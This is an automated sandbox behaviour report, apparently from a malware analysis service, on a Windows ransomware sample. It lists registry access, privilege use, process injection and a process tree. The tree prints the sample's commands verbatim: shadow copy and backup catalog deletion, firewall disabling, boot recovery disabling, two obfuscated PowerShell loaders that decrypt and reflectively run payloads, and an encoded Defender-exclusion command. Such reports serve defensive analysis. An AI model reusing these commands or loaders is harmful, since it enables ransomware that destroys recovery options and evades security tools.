Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\E9AA.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Key created \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E709.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 1840 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe
PID 3176 wrote to memory of 3824 N/A N/A C:\Users\Admin\AppData\Local\Temp\E709.exe
PID 3176 wrote to memory of 3824 N/A N/A C:\Users\Admin\AppData\Local\Temp\E709.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 4056 N/A N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3864 N/A N/A C:\Users\Admin\AppData\Local\Temp\EC3B.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 3324 N/A N/A C:\Users\Admin\AppData\Local\Temp\F9AA.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4892 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2708 N/A N/A C:\Windows\explorer.exe
PID 4056 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 4056 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\E9AA.exe C:\Windows\system32\cmd.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1328 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2232 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1476 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 2528 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2528 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3708 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3708 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4564 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 2748 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4184 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3176 wrote to memory of 1248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3708 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3708 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 3176 wrote to memory of 4356 N/A N/A C:\Windows\explorer.exe
PID 2528 wrote to memory of 1220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4129409437-3162877118-52503038-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0.exe"

C:\Users\Admin\AppData\Local\Temp\E709.exe

C:\Users\Admin\AppData\Local\Temp\E709.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

C:\Users\Admin\AppData\Local\Temp\EC3B.exe

C:\Users\Admin\AppData\Local\Temp\EC3B.exe

C:\Users\Admin\AppData\Local\Temp\E9AA.exe

"C:\Users\Admin\AppData\Local\Temp\E9AA.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4580 -ip 4580

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 460

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Users\Admin\AppData\Local\Temp\F9AA.exe

"C:\Users\Admin\AppData\Local\Temp\F9AA.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

